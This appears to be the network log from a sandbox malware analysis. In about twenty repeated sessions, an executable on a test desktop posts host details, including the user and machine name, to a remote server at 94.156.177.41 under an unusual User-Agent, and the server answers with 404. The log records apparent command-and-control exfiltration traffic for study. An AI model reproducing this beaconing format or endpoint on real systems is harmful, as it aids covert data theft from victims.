                            23192.168.2.64983694.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:31.022804022 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:31.142638922 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:32.430124998 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:32 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            24192.168.2.64984194.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:32.724689007 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:32.844274998 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:34.283608913 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:34 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            25192.168.2.64984894.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:34.553539991 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:34.672995090 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:36.102579117 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:35 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            26192.168.2.64985494.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:36.360389948 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:36.479932070 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:37.817862034 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:37 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            27192.168.2.64985994.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:38.095002890 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:38.214536905 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:39.497653008 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:39 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            28192.168.2.64986394.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:39.752880096 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:39.872509003 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:41.152460098 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:40 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            29192.168.2.64986794.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:41.409809113 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:41.529352903 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:42.964554071 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:42 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            30192.168.2.64987394.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:43.227236986 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:43.346920967 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:44.776232004 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:44 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            31192.168.2.64987994.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:45.035027981 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:45.154565096 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:46.592494965 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:46 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            32192.168.2.64988594.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:46.863600016 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:46.983185053 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:48.268328905 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:48 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            33192.168.2.64988894.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:48.539252043 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:48.658726931 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:50.978399992 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:50 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            34192.168.2.64989694.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:51.237061977 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:51.358824968 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:52.650873899 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:52 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            35192.168.2.64990094.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:52.908112049 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:53.027579069 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:54.731537104 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:54 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            36192.168.2.64990694.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:54.989228964 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:55.108776093 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:56.395785093 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:56 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            37192.168.2.64991194.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:56.670968056 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:56.790419102 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:52:58.223550081 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:57 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            38192.168.2.64991794.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:52:58.490883112 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:52:58.611498117 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:53:00.043214083 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:52:59 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            39192.168.2.64992494.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:00.300306082 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:00.419701099 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:53:01.856334925 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:53:01 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            40192.168.2.64992994.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:02.125020027 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:02.244479895 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:53:03.676702023 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:53:03 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            41192.168.2.64993594.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:03.944591999 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:04.064838886 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:53:05.342324972 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:53:05 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            42192.168.2.64993794.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:05.612095118 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:05.731668949 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
                            Dec 9, 2024 08:53:07.013528109 CET193INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Mon, 09 Dec 2024 07:53:06 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            43192.168.2.64994394.156.177.41803416C:\Users\user\Desktop\0yWVteGq5T.exe
                            TimestampBytes transferredDirectionData
                            Dec 9, 2024 08:53:07.285778999 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 161
                            Connection: close
                            Dec 9, 2024 08:53:07.405384064 CET161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 39 00 34 00 31 00 32 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                            Data Ascii: (ckav.ruengineer494126ENGINEER-PC0FDD42EE188E931437F4FBE2C
